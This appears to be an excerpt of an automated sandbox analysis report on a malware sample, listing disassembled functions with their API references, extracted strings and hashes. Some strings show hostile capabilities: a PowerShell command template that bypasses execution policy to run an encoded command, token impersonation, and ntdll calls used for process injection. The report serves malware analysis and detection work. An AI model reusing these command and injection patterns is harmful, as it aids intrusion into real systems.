free.LIBCMT ref: 006642BF
free.LIBCMT ref: 006642CB
free.LIBCMT ref: 006642D8

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: free$_errno$_callnewhmalloc$AllocHeap
String ID:
API String ID: 996410232-0
Opcode ID: 6118db362e25067081320d314af47720c2282f168c26b715ed83619844a1cd4b
Instruction ID: 2d4a88687e5d7507016a98631cb0bebce9c8d6f38e5837d614730d00a0240c0c
Opcode Fuzzy Hash: 6118db362e25067081320d314af47720c2282f168c26b715ed83619844a1cd4b
Instruction Fuzzy Hash: 074134323047828BDB59DBA699607AB275AFB49BC0F604124EF1A47B05DF38DA62C704

Function 0066F274 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

htonl.WS2_32 ref: 0066F2ED
htonl.WS2_32 ref: 0066F2F7
malloc.LIBCMT ref: 0066F310
free.LIBCMT ref: 0066F37D

Strings

zyxwvutsrqponmlk, xrefs: 0066F34C

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: htonl$freemalloc
String ID: zyxwvutsrqponmlk
API String ID: 1249573706-3884694604
Opcode ID: 71d646e4bb8b7e31db9a3308653b2d67bec3fe39b167032709c668510024000a
Instruction ID: 71bde60fd73a793298d6e4adf1f89da9c9d25217c6deb7eab5dc2c0ca77e50fb
Opcode Fuzzy Hash: 71d646e4bb8b7e31db9a3308653b2d67bec3fe39b167032709c668510024000a
Instruction Fuzzy Hash: CC21373230078046DB94EBB6E56132D6AD3AB89BD0F04803CEE5E87B5BEE3CC5468344

Function 00673FA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 00673FE7
GetProcAddress.KERNEL32 ref: 00673FF7
GetLastError.KERNEL32 ref: 006740BF

Part of subcall function 0067CC00: GetCurrentProcess.KERNEL32 ref: 0067CC8D

Part of subcall function 0067D134: GetCurrentProcess.KERNEL32 ref: 0067D161

Strings

NtMapViewOfSection, xrefs: 00673FED
ntdll.dll, xrefs: 00673FD9

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: CurrentProcess$AddressErrorHandleLastModuleProc
String ID: NtMapViewOfSection$ntdll.dll
API String ID: 1006775078-3170647572
Opcode ID: 4efd516be26a68cc1ab5fab53fe02ed59a35285f2b4b3cec42098ec83d9277dd
Instruction ID: 40f3ebebb26c67e1b7042a69d92add0a9986f91f53ff5cdcb4679804f439bff7
Opcode Fuzzy Hash: 4efd516be26a68cc1ab5fab53fe02ed59a35285f2b4b3cec42098ec83d9277dd
Instruction Fuzzy Hash: 3B31EF32710B4482EB10DB22E45976A73A2F788BB4F048329EF6D07B95DF3DC4468B44

Function 004025E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

signal.MSVCRT ref: 0040268A

Strings

CCG , xrefs: 004025F6

Memory Dump Source

Source File: 00000000.00000002.4153200610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4153182678.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153218366.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153247097.0000000000405000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153288325.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153309084.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4153329691.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_P3KxDOMmD3.jbxd

Similarity

API ID: signal
String ID: CCG
API String ID: 1946981877-1584390748
Opcode ID: 648addc203ed1b4cbdb7cdbf4c8cfef0a20b4c864bfebc609ca8e68908cbbe4c
Instruction ID: 293b1a304c256a7ee66eff26b1d91746a270e19344e3818b9830088d28418f87
Opcode Fuzzy Hash: 648addc203ed1b4cbdb7cdbf4c8cfef0a20b4c864bfebc609ca8e68908cbbe4c
Instruction Fuzzy Hash: 1421A171B0154146EE396279865D33B10019B9A374F284E379A3DA73E0DAFECCC2830E

Function 001BB630 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

_time64.LIBCMT ref: 001BB654

Part of subcall function 001BF84C: _getptd.LIBCMT ref: 001BF854

malloc.LIBCMT ref: 001BB69C
strtok.LIBCMT ref: 001BB700
strtok.LIBCMT ref: 001BB711

Strings

eThreadpoolTimer, xrefs: 001BB6DA

Memory Dump Source

Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: strtok$_getptd_time64malloc
String ID: eThreadpoolTimer
API String ID: 1522986614-2707337283
Opcode ID: b02d7519bf37bc4b38ca8186062a8fc85f913fef5048514e0fa6af22142f2d69
Instruction ID: 6b6eb52b04a315c801423870f2c32a99ef6710bb137d619f24a896f26e01ed9d
Opcode Fuzzy Hash: b02d7519bf37bc4b38ca8186062a8fc85f913fef5048514e0fa6af22142f2d69
Instruction Fuzzy Hash: F921D6B2A14BD485DB10DF52E0886AD77A8F7A8FE4B16426AEF5A83B41CF74C441C780

Function 001B13B0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 001B13D2

Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708

_snprintf.LIBCMT ref: 001B13F1

Part of subcall function 001BEA3C: _errno.LIBCMT ref: 001BEA73
Part of subcall function 001BEA3C: _invalid_parameter_noinfo.LIBCMT ref: 001BEA7E

remove.LIBCMT ref: 001B13FD
remove.LIBCMT ref: 001B1404

Strings

uld not open process: %d (%u), xrefs: 001B13D7

Memory Dump Source

Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: _errno$remove$_callnewh_invalid_parameter_noinfo_snprintfmalloc
String ID: uld not open process: %d (%u)
API String ID: 2566950902-823969559
Opcode ID: fcd4f31b16295b3d981e03ccf995d44eb940f919008a0e94d9d9162e5faefa64
Instruction ID: a95d3efaa90c2af15f19040f1059ad5b508e251585c17898fc7696caa37f8ee5
Opcode Fuzzy Hash: fcd4f31b16295b3d981e03ccf995d44eb940f919008a0e94d9d9162e5faefa64
Instruction Fuzzy Hash: 6DF08261604B90D9D604AB12B8113EAB364E7A8FD0F9D4535FF8917B1ADF3CC5518744

Function 00671FB0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 00671FD2

Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308

_snprintf.LIBCMT ref: 00671FF1

Part of subcall function 0067F63C: _errno.LIBCMT ref: 0067F673
Part of subcall function 0067F63C: _invalid_parameter_noinfo.LIBCMT ref: 0067F67E

remove.LIBCMT ref: 00671FFD
remove.LIBCMT ref: 00672004

Strings

%s\%s, xrefs: 00671FD7

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: _errno$remove$AllocHeap_callnewh_invalid_parameter_noinfo_snprintfmalloc
String ID: %s\%s
API String ID: 1896346573-4073750446
Opcode ID: 6cb8594f6045d264f6437138ccf0bddfe367ceba4f17556bef63a27e1bb3b346
Instruction ID: e0e2b8aff05c8fda56302a13f39a6380ebc104d91b613d64687b117b274513b1
Opcode Fuzzy Hash: 6cb8594f6045d264f6437138ccf0bddfe367ceba4f17556bef63a27e1bb3b346
Instruction Fuzzy Hash: 10F0E925208740C6D350AB51B81036AB366E784FC0F588134BF8C5BB16CE38C5528748

Function 001ADA8C Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMONLIBRARYCODE

Download Yara Rule

APIs

_snprintf.LIBCMT ref: 001ADB25

Part of subcall function 001BEA3C: _errno.LIBCMT ref: 001BEA73
Part of subcall function 001BEA3C: _invalid_parameter_noinfo.LIBCMT ref: 001BEA7E

Part of subcall function 001B6F38: _snprintf.LIBCMT ref: 001B70A5

_snprintf.LIBCMT ref: 001ADBBD

Part of subcall function 001B2170: strchr.LIBCMT ref: 001B21D6
Part of subcall function 001B2170: _snprintf.LIBCMT ref: 001B220C

Part of subcall function 001B200C: strchr.LIBCMT ref: 001B2069
Part of subcall function 001B200C: _snprintf.LIBCMT ref: 001B20B3

_snprintf.LIBCMT ref: 001ADBD4

Strings

rshell -nop -exec bypass -EncodedCommand "%s", xrefs: 001ADACB
/'); %s, xrefs: 001ADB19, 001ADBB2

Memory Dump Source

Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: _snprintf$strchr$_errno_invalid_parameter_noinfo
String ID: /'); %s$rshell -nop -exec bypass -EncodedCommand "%s"
API String ID: 199363273-1250630670
Opcode ID: 6e2045361780fadf1587795c869fcd23f7db7a84374f415de51a140654aa30c6
Instruction ID: 8d1d6e67d711b555cd00468b91f0abeea9f9fc8cd94810074212e067c41a4b5e
Opcode Fuzzy Hash: 6e2045361780fadf1587795c869fcd23f7db7a84374f415de51a140654aa30c6
Instruction Fuzzy Hash: AD61BD36700B8596EB10DF62E8907EEB3A5F799B98F804126EE8E57B58DF78C505C700

Function 006700F8 Relevance: 7.6, APIs: 5, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59c4576cc3bafda9519a74292b63c923cc8fd4fa7f2b0ae73700a3254d899919
Instruction ID: f2c5bbf88da8a699e662fc6f765ffd5b0472a53531a90afa3896da39091dbb55
Opcode Fuzzy Hash: 59c4576cc3bafda9519a74292b63c923cc8fd4fa7f2b0ae73700a3254d899919
Instruction Fuzzy Hash: 1651E063B04A40D6EF40EB75D4412ED6362FB95B88F80D129EE0E2771AEF38D64AC744

Function 001BFA2C Relevance: 7.6, APIs: 5, Instructions: 124COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 001BFA64

Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C

_invalid_parameter_noinfo.LIBCMT ref: 001BFA6F
_flush.LIBCMT ref: 001BFB21
_fileno.LIBCMT ref: 001BFB42
_flsbuf.LIBCMT ref: 001BFB85

Memory Dump Source

Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: _errno_fileno_flsbuf_flush_getptd_noexit_invalid_parameter_noinfo
String ID:
API String ID: 1640621425-0
Opcode ID: f714c1e563aa58d873e3883a1df435710c86d18d380f096712ab5731ea4c4750
Instruction ID: 48bfcc009182e69847d8196810102ae09eb5fa0f863c87d3263119f74cd34897
Opcode Fuzzy Hash: f714c1e563aa58d873e3883a1df435710c86d18d380f096712ab5731ea4c4750
Instruction Fuzzy Hash: 1831062130074486DE2C9E63DE506AAB651F754FE4F18863CDE6A47B91EB78D8878340

Function 0068062C Relevance: 7.6, APIs: 5, Instructions: 124COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 00680664

Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C

_invalid_parameter_noinfo.LIBCMT ref: 0068066F
_flush.LIBCMT ref: 00680721
_fileno.LIBCMT ref: 00680742
_flsbuf.LIBCMT ref: 00680785

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: _errno_fileno_flsbuf_flush_getptd_noexit_invalid_parameter_noinfo
String ID:
API String ID: 1640621425-0
Opcode ID: 09bfc7a718d0a166204737d50e50cc52c68c3e2e3a0cecd9edcc1235780d4021
Instruction ID: 5dfa00621e6b32b7e7e6c45174b9e572d81259c5b26a8d18c8109948671366af
Opcode Fuzzy Hash: 09bfc7a718d0a166204737d50e50cc52c68c3e2e3a0cecd9edcc1235780d4021
Instruction Fuzzy Hash: FC314E3230074047FFA8BE63555025EB653BB94FE0F188B249F6647B91E778D49A8744

Function 001A48F0 Relevance: 7.6, APIs: 6, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 001A493A

Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708

malloc.LIBCMT ref: 001A4945

Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE718
Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE71D

free.LIBCMT ref: 001A4A2C
free.LIBCMT ref: 001A4A34
free.LIBCMT ref: 001A4A40
free.LIBCMT ref: 001A4A4D

Memory Dump Source

Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: free$_errno$_callnewhmalloc
String ID:
API String ID: 2761444284-0
Opcode ID: 326b315c93b4297f8d1cd44fbd3c536e1a3741d65750285d3f659b19031d268f
Instruction ID: ddfe11bee21fe91fe2ede919e1d28a075b0ed0327b27eca2dde5050658343c14
Opcode Fuzzy Hash: 326b315c93b4297f8d1cd44fbd3c536e1a3741d65750285d3f659b19031d268f
Instruction Fuzzy Hash: EA31D0263147D587DF15DB2AA4107AE6B99FBE6BC8F0A8024DD568B711EF78C807C304

Function 006654F0 Relevance: 7.6, APIs: 6, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 0066553A

Part of subcall function 0067F284: _FF_MSGBANNER.LIBCMT ref: 0067F2B4
Part of subcall function 0067F284: _NMSG_WRITE.LIBCMT ref: 0067F2BE
Part of subcall function 0067F284: HeapAlloc.KERNEL32 ref: 0067F2D9
Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F2F2
Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F2FD
Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F308

malloc.LIBCMT ref: 00665545

Part of subcall function 0067F284: _callnewh.LIBCMT ref: 0067F318
Part of subcall function 0067F284: _errno.LIBCMT ref: 0067F31D

free.LIBCMT ref: 0066562C
free.LIBCMT ref: 00665634
free.LIBCMT ref: 00665640
free.LIBCMT ref: 0066564D

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: free$_errno$_callnewhmalloc$AllocHeap
String ID:
API String ID: 996410232-0
Opcode ID: de79741046cbe64d3bb630df06faae11b500053710235a4762571f6057312210
Instruction ID: fa91a802676de7115477e7ecbe885dc73ce57f5083dfd6623bbf0d32d29fbd00
Opcode Fuzzy Hash: de79741046cbe64d3bb630df06faae11b500053710235a4762571f6057312210
Instruction Fuzzy Hash: 2E31F032304B8546EB16DB6A980176B6B5BF795BC8F898034DD5ACB722EE38C946C300

Function 00672D70 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 94stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 006731F4: strchr.LIBCMT ref: 0067322E
Part of subcall function 006731F4: strchr.LIBCMT ref: 0067324C
Part of subcall function 006731F4: malloc.LIBCMT ref: 00673264
Part of subcall function 006731F4: malloc.LIBCMT ref: 00673271
Part of subcall function 006731F4: rand.LIBCMT ref: 0067333D

strchr.LIBCMT ref: 00672DD6
_snprintf.LIBCMT ref: 00672E0C

Part of subcall function 0067F63C: _errno.LIBCMT ref: 0067F673
Part of subcall function 0067F63C: _invalid_parameter_noinfo.LIBCMT ref: 0067F67E

_snprintf.LIBCMT ref: 00672E23

Strings

?%s, xrefs: 00672E05
%s&%s, xrefs: 00672E1C

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: strchr$_snprintfmalloc$_errno_invalid_parameter_noinforand
String ID: %s&%s$?%s
API String ID: 1095232423-1750478248
Opcode ID: 7c8d9433ae2b1aa8ac26fc6f099732b3782b91ff34ed5625b9a0d50b015d32b5
Instruction ID: 1fe48212a70a43d23a9b5d68317c628ddc730258e810a59962683c7a904eb9b7
Opcode Fuzzy Hash: 7c8d9433ae2b1aa8ac26fc6f099732b3782b91ff34ed5625b9a0d50b015d32b5
Instruction Fuzzy Hash: 92419262204E8191EA119F2ED1552E8A3B2FF98B99F089526DF8D57B20EF34D1B2C340

Function 0068AC98 Relevance: 7.6, APIs: 5, Instructions: 93COMMON

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0068ACFA
_isleadbyte_l.LIBCMT ref: 0068AD2A
MultiByteToWideChar.KERNEL32 ref: 0068AD69
MultiByteToWideChar.KERNEL32 ref: 0068ADB7
_errno.LIBCMT ref: 0068ADC1

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::__errno_isleadbyte_l
String ID:
API String ID: 2998201375-0
Opcode ID: bc69b486777a6b9bad5038bbf0975aad08e47f38b0eed12a125a0790956d64d5
Instruction ID: 0be63cf8f76dd2de07813188870e01f120d0accea70a650f284de5b6bec00889
Opcode Fuzzy Hash: bc69b486777a6b9bad5038bbf0975aad08e47f38b0eed12a125a0790956d64d5
Instruction Fuzzy Hash: 8631A03220578086EB60AF55E580769BB66FB85FD0F188326EF8997F65DB38C881C701

Function 001AF064 Relevance: 7.6, APIs: 5, Instructions: 58fileCOMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 001AF085

Part of subcall function 001BE684: _FF_MSGBANNER.LIBCMT ref: 001BE6B4
Part of subcall function 001BE684: _NMSG_WRITE.LIBCMT ref: 001BE6BE
Part of subcall function 001BE684: _callnewh.LIBCMT ref: 001BE6F2
Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE6FD
Part of subcall function 001BE684: _errno.LIBCMT ref: 001BE708

free.LIBCMT ref: 001AF0C0
fwrite.LIBCMT ref: 001AF101
fclose.LIBCMT ref: 001AF109
free.LIBCMT ref: 001AF116

Part of subcall function 001BE644: _errno.LIBCMT ref: 001BE664

Memory Dump Source

Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: _errno$free$_callnewhfclosefwritemalloc
String ID:
API String ID: 1696598829-0
Opcode ID: 1bdd5497ac55f9ceee01cd46502ea43f72165348b95f2b256c95d8f9a827a5ec
Instruction ID: 596a8a54152f7891fa982c53a1485843f2f04b7ac0077e255192b694276bbb64
Opcode Fuzzy Hash: 1bdd5497ac55f9ceee01cd46502ea43f72165348b95f2b256c95d8f9a827a5ec
Instruction Fuzzy Hash: E4118265704B4081DE10F762E5513AE6392EBA5BE4F484239FE6E4BB8ADF3CC5068740

Function 001C99EC Relevance: 7.5, APIs: 5, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 001C99FD

Part of subcall function 001C1118: _getptd_noexit.LIBCMT ref: 001C111C

__doserrno.LIBCMT ref: 001C99F5

Part of subcall function 001C10A8: _getptd_noexit.LIBCMT ref: 001C10AC

Memory Dump Source

Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno_errno
String ID:
API String ID: 2964073243-0
Opcode ID: 02e55afb5f5e5304a095475b8354770d2627f5ba6f47f1d288df05a1981eaf7d
Instruction ID: 85ea3803c73946272d53637bb4f04510df937969011ab4b487b9e71251e7dd7d
Opcode Fuzzy Hash: 02e55afb5f5e5304a095475b8354770d2627f5ba6f47f1d288df05a1981eaf7d
Instruction Fuzzy Hash: 9CF0F672751A4484EF092B74C8967AC7251ABB6F32FA6830DD629073D2C77CC8618710

Function 0068A5EC Relevance: 7.5, APIs: 5, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 0068A5FD

Part of subcall function 00681D18: _getptd_noexit.LIBCMT ref: 00681D1C

__doserrno.LIBCMT ref: 0068A5F5

Part of subcall function 00681CA8: _getptd_noexit.LIBCMT ref: 00681CAC

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno_errno
String ID:
API String ID: 2964073243-0
Opcode ID: 7de39b626677fa29025c8f4af27b0a540db68e2d6824cc23474586602198323a
Instruction ID: 9a5633fb553444a0838e3de5a66e580a6212c88d0cbfca2ea863417caaa9e619
Opcode Fuzzy Hash: 7de39b626677fa29025c8f4af27b0a540db68e2d6824cc23474586602198323a
Instruction Fuzzy Hash: 26F02BB270060445EF097FA4C8A136C72539F51B32FA98306D9390B3D5E77D44D38712

Function 001B5228 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 116stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001B53EC: malloc.LIBCMT ref: 001B5408

strrchr.LIBCMT ref: 001B52ED
_snprintf.LIBCMT ref: 001B539B

Strings

t permissions in process: %d, xrefs: 001B5345, 001B5366
Failed to impersonate token: %d, xrefs: 001B5358

Memory Dump Source

Source File: 00000000.00000002.4153132516.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: _snprintfmallocstrrchr
String ID: Failed to impersonate token: %d$t permissions in process: %d
API String ID: 3587327836-1492073275
Opcode ID: d69273eeb4579e6a96eb8d0c87a60564a21875d7210b55cf29d23a145d20b21e
Instruction ID: 352770fe634819318cdb85f5b69be49ea66c76f3b606d11a1e4ac64c4e353384
Opcode Fuzzy Hash: d69273eeb4579e6a96eb8d0c87a60564a21875d7210b55cf29d23a145d20b21e
Instruction Fuzzy Hash: 1B41B135704A8096DB14FB22B9147AF6792B79AFD4F488125EE5A4BB69DF3CC442C700

Function 00672818 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93sleeppipeCOMMON

Download Yara Rule

APIs

CreatePipe.KERNEL32 ref: 006728A3
GetStartupInfoA.KERNEL32 ref: 006728AD
Sleep.KERNEL32 ref: 006728F4

Part of subcall function 006748D8: GetTickCount.KERNEL32 ref: 006748F1
Part of subcall function 006748D8: GetTickCount.KERNEL32 ref: 00674932

Strings

h, xrefs: 0067284D

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: CountTick$CreateInfoPipeSleepStartup
String ID: h
API String ID: 1809008225-2439710439
Opcode ID: 4e35baa7647db691c7f670eac516f3e1fc872cfd04f6cc2549e4bc2b31640604
Instruction ID: 9dac431128a5d33a1cca976349f8c7763e936ef93a065078d3ae7311692ea35b
Opcode Fuzzy Hash: 4e35baa7647db691c7f670eac516f3e1fc872cfd04f6cc2549e4bc2b31640604
Instruction Fuzzy Hash: CA419A32604B889AE750CF65E84078EB7B6F788798F504219EF9C53B68DF38D646CB40

Function 0067E1D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMONLIBRARYCODE

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32 ref: 0067E26D
LookupAccountSidA.ADVAPI32 ref: 0067E2B2
_snprintf.LIBCMT ref: 0067E2DA

Strings

%s\%s, xrefs: 0067E2C8

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: AccountInformationLookupToken_snprintf
String ID: %s\%s
API String ID: 2107350476-4073750446
Opcode ID: 3628ba452fb9f12347beb94bf517dfb845e986fa94d428b7ed87531c0f30446e
Instruction ID: 76ff5fb1b92f255e071d72172c76c5275d98a87628965d455dad0b8e360381d6
Opcode Fuzzy Hash: 3628ba452fb9f12347beb94bf517dfb845e986fa94d428b7ed87531c0f30446e
Instruction Fuzzy Hash: 2E213032204FC196EB24DF61E8547DA7369F788B88F448126EA8D57B18DF39C31AC740

Function 00687E20 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00688B8A
__crtCapturePreviousContext.LIBCMT ref: 00688BA1
__raise_securityfailure.LIBCMT ref: 00688C43

Strings

Pj, xrefs: 00688C3C

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_660000_P3KxDOMmD3.jbxd

Yara matches

Similarity

API ID: CaptureContextFeaturePresentPreviousProcessor__crt__raise_securityfailure
String ID: Pj
API String ID: 2585579334-1109624870
Opcode ID: fa3aebd98754aec5c2a36f7327a256f2afd717e403199b14b25e934204aebfe6
Instruction ID: e072f98f297580da6a0260de77f9bdce81e2c4c5eefec8c9f79deadb00f27ec1
Opcode Fuzzy Hash: fa3aebd98754aec5c2a36f7327a256f2afd717e403199b14b25e934204aebfe6
Instruction Fuzzy Hash: 68210775704B4085EB50AB18F86135477AAF78A348F90022AEA8D577B1EF7FC865CB01

Function 00674224 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 0067424E
GetProcAddress.KERNEL32 ref: 0067425E

Strings

RtlCreateUserThread, xrefs: 00674254
ntdll.dll, xrefs: 0067423B

Memory Dump Source

Source File: 00000000.00000002.4153366298.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: true

Joe Sandbox IDA Plugin

